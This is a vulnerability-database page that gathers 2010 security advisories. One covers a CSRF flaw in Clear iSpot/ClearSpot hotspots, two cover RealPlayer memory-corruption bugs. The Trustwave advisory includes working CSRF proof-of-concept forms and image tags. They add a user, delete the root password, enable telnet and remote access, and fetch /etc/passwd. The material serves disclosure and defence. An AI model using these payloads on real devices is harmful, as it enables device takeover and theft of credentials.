VARIoT IoT vulnerabilities database

Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi. Clear iSpot and Clearspot are prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible. The following versions are affected: iSpot 2.0.0.0 (R1679) Clearspot 2.0.0.0 (R1512) and 2.0.0.0 (R1786). ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Clear iSpot and Clear Clearspot Cross-Site Request Forgery Vulnerability SECUNIA ADVISORY ID: SA42590 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42590/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42590 RELEASE DATE: 2010-12-26 DISCUSS ADVISORY: http://secunia.com/advisories/42590/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42590/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42590 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Clear iSpot and Clear Clearspot, which can be exploited by malicious people to conduct cross-site request forgery attacks. The application allows users to perform certain actions via HTTP requests without making proper validity checks to verify the requests. This can be exploited to e.g. remove the root password or enable telnet by tricking a logged-in administrator into visiting a malicious web site. The vulnerabilities are reported in Clear iSpot version 2.0.0.0, firmware version 1.9.9.4 and Clear Clearspot version 2.0.0.0, firmware version 1.9.9.4. SOLUTION: Do not browse untrusted web sites or follow untrusted links while being logged-in to the application. PROVIDED AND/OR DISCOVERED BY: Matthew Jakubowski, Trustwave's SpiderLabs ORIGINAL ADVISORY: https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Trustwave's SpiderLabs Security Advisory TWSL2010-008: Clear iSpot/Clearspot CSRF Vulnerabilities https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt Published: 2010-12-10 Version: 1.0 Vendor: Clear (http://www.clear.com <http://www.clear.com/>) Products: iSpot / ClearSpot 4G (http://www.clear.com/devices) Versions affected: The observed behavior the result of a design choice, and may be present on multiple versions. iSpot version: 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)] Clearspot versions: 2.0.0.0 [R1512 (May 31 2010 18:57:09)] 2.0.0.0 [R1786 (Aug 4 2010 20:09:06)] Firmware Version : 1.9.9.4 Hardware Version : R051.2 Device Name : IMW-C615W Device Manufacturer : INFOMARK (http://infomark.co.kr <http://infomark.co.kr/>) Product Description: iSpot and ClearSpot 4G are portable 4G devices, that allow users to share and broadcast their own personal WiFi network. The device connects up to 8 clients at the same time, on the same 4G connection. Credit: Matthew Jakubowski of Trustwave's SpiderLabs CVE: CVE-2010-4507 Finding: These devices are susceptible to Cross-Site Request Forgery (CSRF). An attacker that is able to coerce a ClearSpot / iSpot user into following a link can arbitrarily execute system commands on the device. This level of access also provides a device's client-side SSL certificates, which are used to perform device authentication. This could lead to a compromise of ClearWire accounts as well as other personal information. Add new user: <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi" <http://192.168.1.1/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_cmd_result"> <input type="hidden" name="cmd" value="adduser -S jaku"> <input type="submit"> </form> or <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=adduser% 20-S%20jaku'> Remove root password: <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi" <http://192.168.1.1/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_cmd_result"> <input type="hidden" name="cmd" value="passwd -d root"> <input type="submit"> </form> or <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=passwd%2 0-d%20root'> Enable remote administration access: <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi" <http://192.168.1.1/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_network_set"> <input type="hidden" name="enable_remote_access" value="YES"> <input type="hidden" name="remote_access_port" value="80"> <input type="submit"> </form> or <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&enable_remo te_access=YES&remote_access_port=80'> Enable telnet if not already enabled: <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi" <http://192.168.1.1/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_set_wimax_etc_config"> <input type="hidden" name="ENABLE_TELNET" value="YES"> <input type="submit"> </form> or <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_set_wimax_etc_config&EN ABLE_TELNET=YES'> Allow remote telnet access: <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi" <http://192.168.1.1/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_network_set"> <input type="hidden" name="add_enable" value="YES"> <input type="hidden" name="add_host_ip" value="1"> <input type="hidden" name="add_port" value="23"> <input type="hidden" name="add_protocol" value="BOTH"> <input type="hidden" name="add_memo" value="admintelnet"> <input type="submit"> </form> or <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&add_enable= YES&add_host_ip=1&add_port=23&add_protocol=both&add_memo=admintelnet'> Once compromised, it is possible to download any file from the devices using the following method. Download /etc/passwd file: <form method="post" action="http://192.168.1.1/cgi-bin/upgrademain.cgi <http://192.168.1.1/cgi-bin/upgrademain.cgi> "> <input type="hidden" name="act" value="act_file_download"> <input type="hidden" name="METHOD" value="PATH"> <input type="hidden" name="FILE_PATH" value="/etc/passwd"> <input type="submit"> </form> or <img src='http://192.168.1.1/cgi-bin/upgrademain.cgi?act=act_file_download&METHO D=PATH&FILE_PATH=/etc/passwd'> Vendor Response: No official response is available at the time of release. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Vendor Communication Timeline: 8/26/10 - Vendor contact initiated. 9/30/10 - Vulnerability details provided to vendor. 12/3/10 - Notified vendor of release date. No workaround or patch provided. 12/10/10 - Advisory published. Revision History: 1.0 Initial publication About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com <https://www.trustwave.com/> About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Integer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.0.1, Mac RealPlayer 11.0 through 11.1, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a malformed MLLT atom in an AAC file. This vulnerability allows attackers to execute arbitrary code on vulnerable installations of RealNetworks RealPlayer. The application utilizes a size specified in this data structure for allocation of a list of objects. To calculate the size for the allocation, the application will multiply this length by 8. If the multiplication results in a value greater than 32 bits an integer overflow will occur. When copying data into this buffer heap corruption will occur which can lead to code execution under the context of the currently logged in user. Real Networks RealPlayer is prone to an integer-overflow vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition. This issue affects Windows RealPlayer SP 1.0.1 and prior, Mac RealPlayer 11.1.0.1116 and prior, Linux RealPlayer 11.0.2.1744 and prior. NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: RealPlayer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA38550 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/38550/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 RELEASE DATE: 2010-12-12 DISCUSS ADVISORY: http://secunia.com/advisories/38550/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/38550/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in RealPlayer, which can be exploited by malicious people to compromise a user's system. 1) An error exists when parsing RealAudio content encoded using the "cook" codec. This can be exploited to trigger the use of uninitialised memory and potentially cause a memory corruption via e.g. a specially crafted RealMedia file. 2) An error in the handling of errors encountered while decoding "cook"-encoded audio content can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. 3) An error in the parsing of AAC audio content can be exploited to corrupt memory via specially crafted spectral data. 4) An array indexing error when parsing Media Properties Header (MDPR) in a RealMedia file can be exploited to corrupt memory. 5) An input validation error when parsing a RealMedia file can be exploited to cause a buffer overflow via a specially crafted multi-rate audio stream. 6) An error in the processing of the "StreamTitle" tag in a SHOUTcast stream using the ICY protocol can be exploited to cause an allocation failure for heap memory, which can result in the usage of freed pointers. 8) An input validation error in the "pnen3260.dll" module in the parsing of TIT2 atoms within AAC files can be exploited to corrupt memory. 9) An integer overflow in the parsing of GIF87a files over the streaming protocol RTSP can be exploited to cause a buffer overflow via a large "Screen Width" size in the "Screen Descriptor" header. 10) An error in the parsing of audio codec information in a Real Audio media file can be exploited to to cause a heap-based buffer overflow via a large number of subbands. 11) An input validation error in drv2.dll when decompressing RV20 video streams can be exploited to corrupt heap memory. 12) An unspecified error related to "SIPR" parsing can be exploited to corrupt heap memory. 13) An unspecified error related to "SOUND" processing can be exploited to corrupt heap memory. 14) An unspecified error related to "AAC" processing can be exploited to corrupt heap memory. 15) An unspecified error related to "RealMedia" processing can be exploited to corrupt heap memory. 16) An unspecified error related to "RA5" processing can be exploited to corrupt heap memory. 17) An integer overflow in "drv1.dll" when parsing SIPR stream metadata can be exploited to cause a heap-based buffer overflow, e.g. via the RealPlayer ActiveX control. 18) An input validation error in the processing of RealMedia files can be exploited to corrupt heap memory. 19) An input validation error in the RealAudio codec when processing RealMedia files can be exploited to corrupt heap memory. 20) An error in the "HandleAction" method in the RealPlayer ActiveX control allows users to download and execute scripts in the "Local Zone". 21) Input sanitisation errors in the "Custsupport.html", "Main.html", and "Upsell.htm" components can be exploited to inject arbitrary code into the RealOneActiveXObject process and load unsafe controls. 22) A boundary error in the parsing of cook-specific data used for initialization can be exploited to cause a heap-based buffer overflow. 23) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to cause a heap-based buffer overflow via an invalid size for an embedded MDPR chunk. 24) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to corrupt heap memory via an invalid number streams within the chunk. 25) An input validation error when parsing the RMX file format can be exploited to cause a heap-based buffer overflow. 26) An error when decoding data for particular mime types within a RealMedia file can be exploited to cause a heap-based buffer overflow. 27) An error in the parsing of server headers can be exploited to cause a heap-based buffer overflow via an image tag pointing to a malicious server, which causes the player to fetch a remote file. 28) An error in the implementation of the Advanced Audio Coding compression when decoding a conditional component of a data block within an AAC frame can be exploited to corrupt memory. SOLUTION: Upgrade to RealPlayer 14.0.0 or later. PROVIDED AND/OR DISCOVERED BY: 1, 2) Alin Rad Pop, Secunia Research. 3) Carsten Eiram, Secunia Research. 4) Anonymous and Hossein Lotfi, reported via ZDI. 5 - 11, 20, 21) Anonymous, reported via ZDI. 12 - 14) The vendor credits Nicolas Joly, Vupen 15) The vendor credits Chaouki Bekrar, Vupen 17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs 18, 19) Omair, reported via iDefense. 22, 28) Damian Put, reported via ZDI. 23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team lollersk8erz. 25) Sebastian Apelt, reported via ZDI. 26) Sebastian Apelt and Andreas Schmidt, reported via ZDI. 27) AbdulAziz Hariri, reported via ZDI. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-9/ http://secunia.com/secunia_research/2010-14/ http://secunia.com/secunia_research/2010-15/ RealNetworks: http://service.real.com/realplayer/security/12102010_player/en/ http://realnetworksblog.com/?p=2216 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-268/ http://www.zerodayinitiative.com/advisories/ZDI-10-266/ http://www.zerodayinitiative.com/advisories/ZDI-10-270/ http://www.zerodayinitiative.com/advisories/ZDI-10-273/ http://www.zerodayinitiative.com/advisories/ZDI-10-269/ http://www.zerodayinitiative.com/advisories/ZDI-10-271/ http://www.zerodayinitiative.com/advisories/ZDI-10-272/ http://www.zerodayinitiative.com/advisories/ZDI-10-274/ http://www.zerodayinitiative.com/advisories/ZDI-10-275/ http://www.zerodayinitiative.com/advisories/ZDI-10-276/ http://www.zerodayinitiative.com/advisories/ZDI-10-277/ http://www.zerodayinitiative.com/advisories/ZDI-10-278/ http://www.zerodayinitiative.com/advisories/ZDI-10-279/ http://www.zerodayinitiative.com/advisories/ZDI-10-281/ http://www.zerodayinitiative.com/advisories/ZDI-10-280/ http://www.zerodayinitiative.com/advisories/ZDI-10-282/ http://www.zerodayinitiative.com/advisories/ZDI-10-267/ TippingPoint DVLabs: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-273: RealNetworks RealPlayer AAC MLLT Atom Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-273 December 10, 2010 -- CVE ID: CVE-2010-2999 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: RealNetworks -- Affected Products: RealNetworks RealPlayer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8415. -- Vendor Response: RealNetworks has issued an update to correct this vulnerability. More details can be found at: http://service.real.com/realplayer/security/12102010_player/en/ -- Disclosure Timeline: 2009-08-20 - Vulnerability reported to vendor 2010-12-10 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi

Use-after-free vulnerability in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.0.1, Mac RealPlayer 11.0 through 11.1, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted StreamTitle tag in an ICY SHOUTcast stream, related to the SMIL file format. User interaction is required to exploit this vulnerability in that the target must open a malicious SHOUTcast Stream.The specific flaw exists in the processing of the StreamTitle tag in a SHOUTcast stream using the ICY protocol. A specially crafted string supplied as the property for the title can result in a failed allocation of heap memory. This then causes the freeing of critical pointers that are subsequently used after freeing. Successful exploitation of this vulnerability can lead to system compromise under the credentials of the currently logged in user. Real Networks released an advisory regarding 27 security vulnerabilities in RealPlayer. Real Networks RealPlayer is prone to heap corruption vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition. This issue affects Windows RealPlayer SP 1.0.1 and prior, Mac RealPlayer 11.1.0.1116 and prior, Linux RealPlayer 11.0.2.1744 and prior. NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading/converting videos (in web pages), editing videos, managing media files, and more. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: RealPlayer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA38550 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/38550/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 RELEASE DATE: 2010-12-12 DISCUSS ADVISORY: http://secunia.com/advisories/38550/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/38550/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in RealPlayer, which can be exploited by malicious people to compromise a user's system. 1) An error exists when parsing RealAudio content encoded using the "cook" codec. This can be exploited to trigger the use of uninitialised memory and potentially cause a memory corruption via e.g. a specially crafted RealMedia file. 2) An error in the handling of errors encountered while decoding "cook"-encoded audio content can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. 3) An error in the parsing of AAC audio content can be exploited to corrupt memory via specially crafted spectral data. 4) An array indexing error when parsing Media Properties Header (MDPR) in a RealMedia file can be exploited to corrupt memory. 5) An input validation error when parsing a RealMedia file can be exploited to cause a buffer overflow via a specially crafted multi-rate audio stream. 7) An integer overflow error when parsing a MLLT atom in an .AAC file can be exploited to cause a buffer overflow. 8) An input validation error in the "pnen3260.dll" module in the parsing of TIT2 atoms within AAC files can be exploited to corrupt memory. 9) An integer overflow in the parsing of GIF87a files over the streaming protocol RTSP can be exploited to cause a buffer overflow via a large "Screen Width" size in the "Screen Descriptor" header. 10) An error in the parsing of audio codec information in a Real Audio media file can be exploited to to cause a heap-based buffer overflow via a large number of subbands. 11) An input validation error in drv2.dll when decompressing RV20 video streams can be exploited to corrupt heap memory. 12) An unspecified error related to "SIPR" parsing can be exploited to corrupt heap memory. 13) An unspecified error related to "SOUND" processing can be exploited to corrupt heap memory. 14) An unspecified error related to "AAC" processing can be exploited to corrupt heap memory. 15) An unspecified error related to "RealMedia" processing can be exploited to corrupt heap memory. 16) An unspecified error related to "RA5" processing can be exploited to corrupt heap memory. 17) An integer overflow in "drv1.dll" when parsing SIPR stream metadata can be exploited to cause a heap-based buffer overflow, e.g. via the RealPlayer ActiveX control. 18) An input validation error in the processing of RealMedia files can be exploited to corrupt heap memory. 19) An input validation error in the RealAudio codec when processing RealMedia files can be exploited to corrupt heap memory. 20) An error in the "HandleAction" method in the RealPlayer ActiveX control allows users to download and execute scripts in the "Local Zone". 21) Input sanitisation errors in the "Custsupport.html", "Main.html", and "Upsell.htm" components can be exploited to inject arbitrary code into the RealOneActiveXObject process and load unsafe controls. 22) A boundary error in the parsing of cook-specific data used for initialization can be exploited to cause a heap-based buffer overflow. 23) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to cause a heap-based buffer overflow via an invalid size for an embedded MDPR chunk. 24) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to corrupt heap memory via an invalid number streams within the chunk. 25) An input validation error when parsing the RMX file format can be exploited to cause a heap-based buffer overflow. 26) An error when decoding data for particular mime types within a RealMedia file can be exploited to cause a heap-based buffer overflow. 27) An error in the parsing of server headers can be exploited to cause a heap-based buffer overflow via an image tag pointing to a malicious server, which causes the player to fetch a remote file. 28) An error in the implementation of the Advanced Audio Coding compression when decoding a conditional component of a data block within an AAC frame can be exploited to corrupt memory. SOLUTION: Upgrade to RealPlayer 14.0.0 or later. PROVIDED AND/OR DISCOVERED BY: 1, 2) Alin Rad Pop, Secunia Research. 3) Carsten Eiram, Secunia Research. 4) Anonymous and Hossein Lotfi, reported via ZDI. 5 - 11, 20, 21) Anonymous, reported via ZDI. 12 - 14) The vendor credits Nicolas Joly, Vupen 15) The vendor credits Chaouki Bekrar, Vupen 17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs 18, 19) Omair, reported via iDefense. 22, 28) Damian Put, reported via ZDI. 23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team lollersk8erz. 25) Sebastian Apelt, reported via ZDI. 26) Sebastian Apelt and Andreas Schmidt, reported via ZDI. 27) AbdulAziz Hariri, reported via ZDI. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-9/ http://secunia.com/secunia_research/2010-14/ http://secunia.com/secunia_research/2010-15/ RealNetworks: http://service.real.com/realplayer/security/12102010_player/en/ http://realnetworksblog.com/?p=2216 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-268/ http://www.zerodayinitiative.com/advisories/ZDI-10-266/ http://www.zerodayinitiative.com/advisories/ZDI-10-270/ http://www.zerodayinitiative.com/advisories/ZDI-10-273/ http://www.zerodayinitiative.com/advisories/ZDI-10-269/ http://www.zerodayinitiative.com/advisories/ZDI-10-271/ http://www.zerodayinitiative.com/advisories/ZDI-10-272/ http://www.zerodayinitiative.com/advisories/ZDI-10-274/ http://www.zerodayinitiative.com/advisories/ZDI-10-275/ http://www.zerodayinitiative.com/advisories/ZDI-10-276/ http://www.zerodayinitiative.com/advisories/ZDI-10-277/ http://www.zerodayinitiative.com/advisories/ZDI-10-278/ http://www.zerodayinitiative.com/advisories/ZDI-10-279/ http://www.zerodayinitiative.com/advisories/ZDI-10-281/ http://www.zerodayinitiative.com/advisories/ZDI-10-280/ http://www.zerodayinitiative.com/advisories/ZDI-10-282/ http://www.zerodayinitiative.com/advisories/ZDI-10-267/ TippingPoint DVLabs: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-270: RealNetworks RealPlayer ICY Protocol StreamTitle Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-270 December 10, 2010 -- CVE ID: CVE-2010-2997 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: RealNetworks -- Affected Products: RealNetworks RealPlayer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8344. -- Vendor Response: RealNetworks has issued an update to correct this vulnerability. More details can be found at: http://service.real.com/realplayer/security/12102010_player/en/ -- Disclosure Timeline: 2009-06-25 - Vulnerability reported to vendor 2010-12-10 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi

